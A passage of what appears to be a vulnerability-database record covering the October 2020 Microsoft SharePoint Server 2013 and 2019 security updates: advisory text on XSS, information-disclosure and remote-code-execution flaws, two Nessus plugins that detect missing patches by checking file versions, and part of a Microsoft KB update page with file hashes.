Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server. An authenticated attacker could exploit the vulnerability by sending a specially crafted request to an affected SharePoint server. The attacker who successfully exploited the vulnerability could then perform cross-site scripting attacks on affected systems and run script in the security context of the current user. The attacks could allow the attacker to read content that the attacker is not authorized to read, use the victim's identity to take actions on the SharePoint site on behalf of the user, such as change permissions and delete content, and inject malicious content in the browser of the user. The security update addresses the vulnerability by helping to ensure that SharePoint Server properly sanitizes web requests. (CVE-2020-16945, CVE-2020-16946)\n\n - An information disclosure vulnerability exists when Microsoft SharePoint Server improperly discloses its folder structure when rendering specific web pages. An attacker who took advantage of this information disclosure could view the folder path of scripts loaded on the page. To take advantage of the vulnerability, an attacker would require access to the specific SharePoint page affected by this vulnerability. The security update addresses the vulnerability by correcting how scripts are referenced on some SharePoint pages.\n (CVE-2020-16941, CVE-2020-16942)\n\n - A remote code execution vulnerability exists in Microsoft Excel software when the software fails to properly handle objects in memory. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-16929)\n\n - A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the SharePoint application pool and the SharePoint server farm account.\n Exploitation of this vulnerability requires that a user uploads a specially crafted SharePoint application package to an affected version of SharePoint. The security update addresses the vulnerability by correcting how SharePoint checks the source markup of application packages. (CVE-2020-16951, CVE-2020-16952)\n\n - This vulnerability is caused when SharePoint Server does not properly sanitize a specially crafted request to an affected SharePoint server. An authenticated attacker could exploit this vulnerability by sending a specially crafted request to an affected SharePoint server. The attacker who successfully exploited this vulnerability could then perform cross-site scripting attacks on affected systems and run script in the security context of the current user. These attacks could allow the attacker to read content that the attacker is not authorized to read, use the victim's identity to take actions on the SharePoint site on behalf of the victim, such as change permissions, delete content, steal sensitive information (such as browser cookies) and inject malicious content in the browser of the victim.\n For this vulnerability to be exploited, a user must click a specially crafted URL that takes the user to a targeted SharePoint Web App site. In an email attack scenario, an attacker could exploit the vulnerability by sending an email message containing the specially crafted URL to the user of the targeted SharePoint Web App site and convincing the user to click the specially crafted URL. (CVE-2020-16944)", "cvss3": {}, "published": "2020-10-13T00:00:00", "type": "nessus", "title": "Security Updates for Microsoft SharePoint Server 2013 (October 2020)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-16929", "CVE-2020-16941", "CVE-2020-16942", "CVE-2020-16944", "CVE-2020-16945", "CVE-2020-16946", "CVE-2020-16948", "CVE-2020-16951", "CVE-2020-16952", "CVE-2020-16953"], "modified": "2023-03-08T00:00:00", "cpe": ["cpe:/a:microsoft:sharepoint_server", "cpe:/a:microsoft:sharepoint_foundation"], "id": "SMB_NT_MS20_OCT_OFFICE_SHAREPOINT_2013.NASL", "href": "https://www.tenable.com/plugins/nessus/141425", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(141425);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/03/08\");\n\n script_cve_id(\n \"CVE-2020-16929\",\n \"CVE-2020-16941\",\n \"CVE-2020-16942\",\n \"CVE-2020-16944\",\n \"CVE-2020-16945\",\n \"CVE-2020-16946\",\n \"CVE-2020-16948\",\n \"CVE-2020-16951\",\n \"CVE-2020-16952\",\n \"CVE-2020-16953\"\n );\n script_xref(name:\"MSKB\", value:\"4486687\");\n script_xref(name:\"MSKB\", value:\"4486694\");\n script_xref(name:\"MSFT\", value:\"MS20-4486687\");\n script_xref(name:\"MSFT\", value:\"MS20-4486694\");\n script_xref(name:\"IAVA\", value:\"2020-A-0460-S\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0126\");\n\n script_name(english:\"Security Updates for Microsoft SharePoint Server 2013 (October 2020)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Microsoft SharePoint Server 2013 installation on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Microsoft SharePoint Server 2013 installation on the\nremote host is missing security updates. It is, therefore,\naffected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists when\n Microsoft SharePoint Server fails to properly handle\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. (CVE-2020-16948,\n CVE-2020-16953)\n\n - A cross-site-scripting (XSS) vulnerability exists when\n Microsoft SharePoint Server does not properly sanitize a\n specially crafted web request to an affected SharePoint\n server. An authenticated attacker could exploit the\n vulnerability by sending a specially crafted request to\n an affected SharePoint server. The attacker who\n successfully exploited the vulnerability could then\n perform cross-site scripting attacks on affected systems\n and run script in the security context of the current\n user. The attacks could allow the attacker to read\n content that the attacker is not authorized to read, use\n the victim's identity to take actions on the SharePoint\n site on behalf of the user, such as change permissions\n and delete content, and inject malicious content in the\n browser of the user. The security update addresses the\n vulnerability by helping to ensure that SharePoint\n Server properly sanitizes web requests. (CVE-2020-16945,\n CVE-2020-16946)\n\n - An information disclosure vulnerability exists when\n Microsoft SharePoint Server improperly discloses its\n folder structure when rendering specific web pages. An\n attacker who took advantage of this information\n disclosure could view the folder path of scripts loaded\n on the page. To take advantage of the vulnerability, an\n attacker would require access to the specific SharePoint\n page affected by this vulnerability. The security update\n addresses the vulnerability by correcting how scripts\n are referenced on some SharePoint pages.\n (CVE-2020-16941, CVE-2020-16942)\n\n - A remote code execution vulnerability exists in\n Microsoft Excel software when the software fails to\n properly handle objects in memory. An attacker who\n successfully exploited the vulnerability could run\n arbitrary code in the context of the current user. If\n the current user is logged on with administrative user\n rights, an attacker could take control of the affected\n system. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-16929)\n\n - A remote code execution vulnerability exists in\n Microsoft SharePoint when the software fails to check\n the source markup of an application package. An attacker\n who successfully exploited the vulnerability could run\n arbitrary code in the context of the SharePoint\n application pool and the SharePoint server farm account.\n Exploitation of this vulnerability requires that a user\n uploads a specially crafted SharePoint application\n package to an affected version of SharePoint. The\n security update addresses the vulnerability by\n correcting how SharePoint checks the source markup of\n application packages. (CVE-2020-16951, CVE-2020-16952)\n\n - This vulnerability is caused when SharePoint Server does\n not properly sanitize a specially crafted request to an\n affected SharePoint server. An authenticated attacker\n could exploit this vulnerability by sending a specially\n crafted request to an affected SharePoint server. The\n attacker who successfully exploited this vulnerability\n could then perform cross-site scripting attacks on\n affected systems and run script in the security context\n of the current user. These attacks could allow the\n attacker to read content that the attacker is not\n authorized to read, use the victim's identity to take\n actions on the SharePoint site on behalf of the victim,\n such as change permissions, delete content, steal\n sensitive information (such as browser cookies) and\n inject malicious content in the browser of the victim.\n For this vulnerability to be exploited, a user must\n click a specially crafted URL that takes the user to a\n targeted SharePoint Web App site. In an email attack\n scenario, an attacker could exploit the vulnerability by\n sending an email message containing the specially\n crafted URL to the user of the targeted SharePoint Web\n App site and convincing the user to click the specially\n crafted URL. (CVE-2020-16944)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4486687\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4486694\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released the following security updates to address this issue: \n -KB4486687\n -KB4486694\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-16952\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft SharePoint Server-Side Include and ViewState RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/10/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:sharepoint_foundation\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:sharepoint_server\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"microsoft_sharepoint_installed.nbin\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('misc_func.inc');\ninclude('install_func.inc');\ninclude('lists.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-10';\n\nkbs = make_list(\n '4486687',\n '4486694'\n);\n\nif (get_kb_item('Host/patch_management_checks'))\n hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_WARNING);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated', exit_code:1);\n\n# Get path information for Windows.\nwindir = hotfix_get_systemroot();\nif (isnull(windir)) exit(1, 'Failed to determine the location of %windir%.');\n\nregistry_init();\n\ninstall = get_single_install(app_name:'Microsoft SharePoint Server');\n\nkb_checks =\n{\n '2013':\n { '1':\n {'Foundation':\n [{\n 'kb' : '4486694',\n 'path' : hotfix_get_commonfilesdir(),\n 'append' : 'microsoft shared\\\\web server extensions\\\\15\\\\bin',\n 'file' : 'onetutil.dll',\n 'version' : '15.0.5285.1000',\n 'product_name' : 'Microsoft SharePoint Foundation Server 2013 SP1'\n }],\n 'Server':\n [{ \n 'kb' : '4486687',\n 'path' : install['path'],\n 'append' : 'bin',\n 'file' : 'xlsrv.dll',\n 'version' : '15.0.5285.1000',\n 'product_name' : 'Microsoft SharePoint Enterprise Server 2013 SP1'\n }]\n }\n }\n};\n\n# Get the specific product / path \nparam_list = kb_checks[install['Product']][install['SP']][install['Edition']];\n\n# audit if not affected\nif(isnull(param_list)) audit(AUDIT_INST_VER_NOT_VULN, 'Microsoft SharePoint Server');\n\nvuln = FALSE;\nxss = FALSE;\nport = kb_smb_transport();\n\n# grab the path otherwise\nforeach check (param_list)\n{\n \n if (!isnull(check['version']))\n {\n path = hotfix_append_path(path:check['path'], value:check['append']);\n\n are_we_vuln = hotfix_check_fversion(\n file:check['file'],\n version:check['version'],\n path:path,\n kb:check['kb'],\n product:check['product_name']\n );\n }\n else\n {\n report = '\\n';\n\n if (check['product_name'])\n report += ' Product : ' + check['product_name'] + '\\n';\n if (check['kb'])\n report += ' KB : ' + check['kb'] + '\\n';\n hotfix_add_report(report, kb:check['kb']);\n }\n\n if(are_we_vuln == HCF_OLDER)\n {\n vuln = TRUE;\n if ( check['kb'] == '4486694' || \n check['kb'] == 'xx' || \n check['kb'] == 'xx' \n ) xss = TRUE;\n }\n}\n\nif (vuln)\n{\n port = kb_smb_transport();\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n if (xss) replace_kb_item(name:'www/' + port + '/XSS', value:TRUE);\n hotfix_security_warning();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:24:03", "description": "The Microsoft SharePoint Server 2019 installation on the remote host is missing security updates. It is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists when Microsoft SharePoint Server fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-16948, CVE-2020-16950, CVE-2020-16953)\n\n - An information disclosure vulnerability exists when Microsoft SharePoint Server improperly discloses its folder structure when rendering specific web pages. An attacker who took advantage of this information disclosure could view the folder path of scripts loaded on the page. To take advantage of the vulnerability, an attacker would require access to the specific SharePoint page affected by this vulnerability. The security update addresses the vulnerability by correcting how scripts are referenced on some SharePoint pages.\n (CVE-2020-16941, CVE-2020-16942)\n\n - A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the SharePoint application pool and the SharePoint server farm account.\n Exploitation of this vulnerability requires that a user uploads a specially crafted SharePoint application package to an affected version of SharePoint. The security update addresses the vulnerability by correcting how SharePoint checks the source markup of application packages. (CVE-2020-16951, CVE-2020-16952)\n\n - This vulnerability is caused when SharePoint Server does not properly sanitize a specially crafted request to an affected SharePoint server. An authenticated attacker could exploit this vulnerability by sending a specially crafted request to an affected SharePoint server. The attacker who successfully exploited this vulnerability could then perform cross-site scripting attacks on affected systems and run script in the security context of the current user. These attacks could allow the attacker to read content that the attacker is not authorized to read, use the victim's identity to take actions on the SharePoint site on behalf of the victim, such as change permissions, delete content, steal sensitive information (such as browser cookies) and inject malicious content in the browser of the victim.\n For this vulnerability to be exploited, a user must click a specially crafted URL that takes the user to a targeted SharePoint Web App site. In an email attack scenario, an attacker could exploit the vulnerability by sending an email message containing the specially crafted URL to the user of the targeted SharePoint Web App site and convincing the user to click the specially crafted URL. (CVE-2020-16944)\n\n - A cross-site-scripting (XSS) vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server. An authenticated attacker could exploit the vulnerability by sending a specially crafted request to an affected SharePoint server. The attacker who successfully exploited the vulnerability could then perform cross-site scripting attacks on affected systems and run script in the security context of the current user. The attacks could allow the attacker to read content that the attacker is not authorized to read, use the victim's identity to take actions on the SharePoint site on behalf of the user, such as change permissions and delete content, and inject malicious content in the browser of the user. The security update addresses the vulnerability by helping to ensure that SharePoint Server properly sanitizes web requests. (CVE-2020-16945, CVE-2020-16946)", "cvss3": {}, "published": "2020-10-13T00:00:00", "type": "nessus", "title": "Security Updates for Microsoft SharePoint Server 2019 (October 2020)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-16941", "CVE-2020-16942", "CVE-2020-16944", "CVE-2020-16945", "CVE-2020-16946", "CVE-2020-16948", "CVE-2020-16950", "CVE-2020-16951", "CVE-2020-16952", "CVE-2020-16953"], "modified": "2023-03-08T00:00:00", "cpe": ["cpe:/a:microsoft:sharepoint_server", "cpe:/a:microsoft:sharepoint_foundation"], "id": "SMB_NT_MS20_OCT_OFFICE_SHAREPOINT_2019.NASL", "href": "https://www.tenable.com/plugins/nessus/141419", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(141419);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/03/08\");\n\n script_cve_id(\n \"CVE-2020-16941\",\n \"CVE-2020-16942\",\n \"CVE-2020-16944\",\n \"CVE-2020-16945\",\n \"CVE-2020-16946\",\n \"CVE-2020-16948\",\n \"CVE-2020-16950\",\n \"CVE-2020-16951\",\n \"CVE-2020-16952\",\n \"CVE-2020-16953\"\n );\n script_xref(name:\"MSKB\", value:\"4486676\");\n script_xref(name:\"MSFT\", value:\"MS20-4486676\");\n script_xref(name:\"IAVA\", value:\"2020-A-0460-S\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0126\");\n\n script_name(english:\"Security Updates for Microsoft SharePoint Server 2019 (October 2020)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Microsoft SharePoint Server 2019 installation on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Microsoft SharePoint Server 2019 installation on the\nremote host is missing security updates. It is, therefore,\naffected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists when\n Microsoft SharePoint Server fails to properly handle\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. (CVE-2020-16948,\n CVE-2020-16950, CVE-2020-16953)\n\n - An information disclosure vulnerability exists when\n Microsoft SharePoint Server improperly discloses its\n folder structure when rendering specific web pages. An\n attacker who took advantage of this information\n disclosure could view the folder path of scripts loaded\n on the page. To take advantage of the vulnerability, an\n attacker would require access to the specific SharePoint\n page affected by this vulnerability. The security update\n addresses the vulnerability by correcting how scripts\n are referenced on some SharePoint pages.\n (CVE-2020-16941, CVE-2020-16942)\n\n - A remote code execution vulnerability exists in\n Microsoft SharePoint when the software fails to check\n the source markup of an application package. An attacker\n who successfully exploited the vulnerability could run\n arbitrary code in the context of the SharePoint\n application pool and the SharePoint server farm account.\n Exploitation of this vulnerability requires that a user\n uploads a specially crafted SharePoint application\n package to an affected version of SharePoint. The\n security update addresses the vulnerability by\n correcting how SharePoint checks the source markup of\n application packages. (CVE-2020-16951, CVE-2020-16952)\n\n - This vulnerability is caused when SharePoint Server does\n not properly sanitize a specially crafted request to an\n affected SharePoint server. An authenticated attacker\n could exploit this vulnerability by sending a specially\n crafted request to an affected SharePoint server. The\n attacker who successfully exploited this vulnerability\n could then perform cross-site scripting attacks on\n affected systems and run script in the security context\n of the current user. These attacks could allow the\n attacker to read content that the attacker is not\n authorized to read, use the victim's identity to take\n actions on the SharePoint site on behalf of the victim,\n such as change permissions, delete content, steal\n sensitive information (such as browser cookies) and\n inject malicious content in the browser of the victim.\n For this vulnerability to be exploited, a user must\n click a specially crafted URL that takes the user to a\n targeted SharePoint Web App site. In an email attack\n scenario, an attacker could exploit the vulnerability by\n sending an email message containing the specially\n crafted URL to the user of the targeted SharePoint Web\n App site and convincing the user to click the specially\n crafted URL. (CVE-2020-16944)\n\n - A cross-site-scripting (XSS) vulnerability exists when\n Microsoft SharePoint Server does not properly sanitize a\n specially crafted web request to an affected SharePoint\n server. An authenticated attacker could exploit the\n vulnerability by sending a specially crafted request to\n an affected SharePoint server. The attacker who\n successfully exploited the vulnerability could then\n perform cross-site scripting attacks on affected systems\n and run script in the security context of the current\n user. The attacks could allow the attacker to read\n content that the attacker is not authorized to read, use\n the victim's identity to take actions on the SharePoint\n site on behalf of the user, such as change permissions\n and delete content, and inject malicious content in the\n browser of the user. The security update addresses the\n vulnerability by helping to ensure that SharePoint\n Server properly sanitizes web requests. (CVE-2020-16945,\n CVE-2020-16946)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4486676\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released KB4486676 to address this issue.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-16952\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft SharePoint Server-Side Include and ViewState RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/10/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:sharepoint_foundation\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:sharepoint_server\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"microsoft_sharepoint_installed.nbin\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('misc_func.inc');\ninclude('install_func.inc');\ninclude('lists.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-10';\n\nkbs = make_list(\n '4486676'\n);\n\nif (get_kb_item('Host/patch_management_checks'))\n hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_WARNING);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated', exit_code:1);\n\n# Get path information for Windows.\nwindir = hotfix_get_systemroot();\nif (isnull(windir)) exit(1, 'Failed to determine the location of %windir%.');\n\nregistry_init();\n\ninstall = get_single_install(app_name:'Microsoft SharePoint Server');\n\nkb_checks =\n{\n '2019':\n { '0':\n {'Server':\n [{\n 'kb' : '4486676',\n 'path' : install['path'],\n 'append' : 'bin',\n 'file' : 'ascalc.dll',\n 'version' : '16.0.10367.20000',\n 'product_name' : 'Microsoft SharePoint Server 2019'\n }]\n }\n }\n};\n\n# Get the specific product / path \nparam_list = kb_checks[install['Product']][install['SP']][install['Edition']];\n\n# audit if not affected\nif(isnull(param_list)) audit(AUDIT_INST_VER_NOT_VULN, 'Microsoft SharePoint Server');\n\n\nvuln = FALSE;\nxss = FALSE;\nport = kb_smb_transport();\n\n# grab the path otherwise\nforeach check (param_list)\n{\n \n if (!isnull(check['version']))\n {\n path = hotfix_append_path(path:check['path'], value:check['append']);\n\n are_we_vuln = hotfix_check_fversion(\n file:check['file'],\n version:check['version'],\n path:path,\n kb:check['kb'],\n product:check['product_name']\n );\n }\n else\n {\n report = '\\n';\n\n if (check['product_name'])\n report += ' Product : ' + check['product_name'] + '\\n';\n if (check['kb'])\n report += ' KB : ' + check['kb'] + '\\n';\n hotfix_add_report(report, kb:check['kb']);\n }\n\n if(are_we_vuln == HCF_OLDER)\n {\n vuln = TRUE;\n if (check['kb'] == '4486676') xss = TRUE;\n }\n}\n\nif (vuln)\n{\n port = kb_smb_transport();\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n if (xss) replace_kb_item(name:'www/' + port + '/XSS', value:TRUE);\n hotfix_security_warning();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "mskb": [{"lastseen": "2023-06-23T19:20:55", "description": "None\n## Summary\n\nThis security update resolves vulnerabilities in Microsoft Office that could allow remote code execution if a user opens a specially crafted Office file. To learn more about these vulnerabilities, see the following security advisories:\n\n * [Microsoft Common Vulnerabilities and Exposures CVE-2020-16941](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16941>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2020-16942](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16942>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2020-16944](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16944>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2020-16945](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16945>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2020-16946](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16946>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2020-16948](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16948>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2020-16951](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16951>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2020-16952](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2020-16953](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16953>)\n**Note** To apply this security update, you must have the release version of [Service Pack 1 for Microsoft SharePoint Foundation 2013](<http://support.microsoft.com/kb/2880551>) installed on the computer.\n\n## How to get and install the update\n\n### Method 1: Microsoft Update\n\nThis update is available from Microsoft Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to get security updates automatically, see [Windows Update: FAQ](<https://support.microsoft.com/en-us/help/12373/windows-update-faq>).\n\n### Method 2: Microsoft Update Catalog\n\nTo get the standalone package for this update, go to the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/Search.aspx?q=KB4486694>) website.\n\n### Method 3: Microsoft Download Center\n\nYou can get the standalone update package through the Microsoft Download Center. Follow the installation instructions on the download page to install the update.\n\n * [Download security update 4486694 for the 64-bit version of SharePoint Foundation 2013](<http://www.microsoft.com/download/details.aspx?familyid=bcba9adf-419c-4658-a4ae-20ebc679ac28>)\n\n## More information\n\n### Security update deployment information\n\nFor deployment information about this update, see [security update deployment information: October 13, 2020](<https://support.microsoft.com/en-us/help/20201013>).\n\n### Security update replacement information\n\nThis security update replaces previously released security update [4484525](<http://support.microsoft.com/kb/4484525>).\n\n### File hash information\n\nFile name| SHA1 hash| SHA256 hash \n---|---|--- \nsts2013-kb4486694-fullfile-x64-glb.exe| 4CA46BB918222AA3F1168F1FB8076FF2A6B7CC25| C26085F3D0B84F1FD7EDE53BBC990E5E61DD4300E185DF611670EF7828FE8A61 \n \nFile informationThe English (United States) version of this software update installs files that have the attributes that are listed in the following table. The dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time together with your current daylight saving time (DST) bias. Additionally, the dates and times may change when you perform certain operations on the files.\n\n## \n\n__\n\nFor all supported x64-based versions of SharePoint Foundation 2013\n\nFile identifier| File name| File version| File size| Date| Time \n---|---|---|---|---|--- \nmicrosoft.cobaltcore.dll| microsoft.cobaltcore.dll| 15.0.4991.1000| 1211112| 15-Sep-20| 11:35 \ncsisrv.dll| csisrv.dll| 15.0.5233.1000| 1410656| 15-Sep-20| 11:36 \ncsisrvexe.exe| csisrvexe.exe| 15.0.5233.1000| 203664| 15-Sep-20| 11:36 \nonfda.dll| onfda.dll| 15.0.5233.1000| 2151312| 15-Sep-20| 11:36 \njsapiextensibilitymanager.debug.js| jsapiextensibilitymanager.debug.js| | 20163| 15-Sep-20| 11:36 \nganttsharepointapishim.generated.debug.js| ganttapishim.generated.debug.js| | 6812| 15-Sep-20| 11:36 \nganttsharedapi.generated.debug.js| ganttsharedapi.generated.debug.js| | 4617| 15-Sep-20| 11:36 \ntimelinesharepointapishim.generated.debug.js| timelineapishim.generated.debug.js| | 1842| 15-Sep-20| 11:36 \ntimelinesharedapi.generated.debug.js| timelinesharedapi.generated.debug.js| | 3420| 15-Sep-20| 11:36 \nmsoidclil.dll| msoidclil.dll| 7.250.4556.0| 1446248| 15-Sep-20| 11:35 \nmsoidclil.dll.x64| msoidclil.dll| 7.250.4556.0| 1446248| 15-Sep-20| 11:35 \nmsoidres.dll| msoidres.dll| 7.250.4556.0| 830864| 15-Sep-20| 11:35 \nmsoidres.dll.x64| msoidres.dll| 7.250.4556.0| 830864| 15-Sep-20| 11:35 \nmsoidclil.dll| msoidclil.dll| 7.250.4556.0| 1220456| 15-Sep-20| 11:35 \nmsoidclil.dll.x86| msoidclil.dll| 7.250.4556.0| 1220456| 15-Sep-20| 11:35 \nmsoidres.dll| msoidres.dll| 7.250.4556.0| 830864| 15-Sep-20| 11:35 \nmsoidres.dll.x86| msoidres.dll| 7.250.4556.0| 830864| 15-Sep-20| 11:35 \ncompat.bro| compat.browser| | 14781| 15-Sep-20| 11:36 \nmicrosoft.naturallanguage.keywordextraction.resources.en.dll| microsoft.naturallanguage.keywordextraction.resources.dll| 15.0.5259.1000| 2745752| 15-Sep-20| 11:35 \ndevdash15.png| devdash15.png| | 699| 16-Sep-20| 12:50 \ndevsitegettingstarted.png| devsitegettingstarted.png| | 4798| 16-Sep-20| 12:50 \ngettingstarted.png| gettingstarted.png| | 4260| 16-Sep-20| 12:50 \ngettingstartedwithappcatalogsite.png| gettingstartedwithappcatalogsite.png| | 1518| 16-Sep-20| 12:50 \nspcommon.png| spcommon.png| | 19434| 16-Sep-20| 12:50 \nspimn.png| spimn.png| | 4248| 16-Sep-20| 12:50 \nspnav.png| spnav.png| | 651| 16-Sep-20| 12:50 \nsproaming.png| 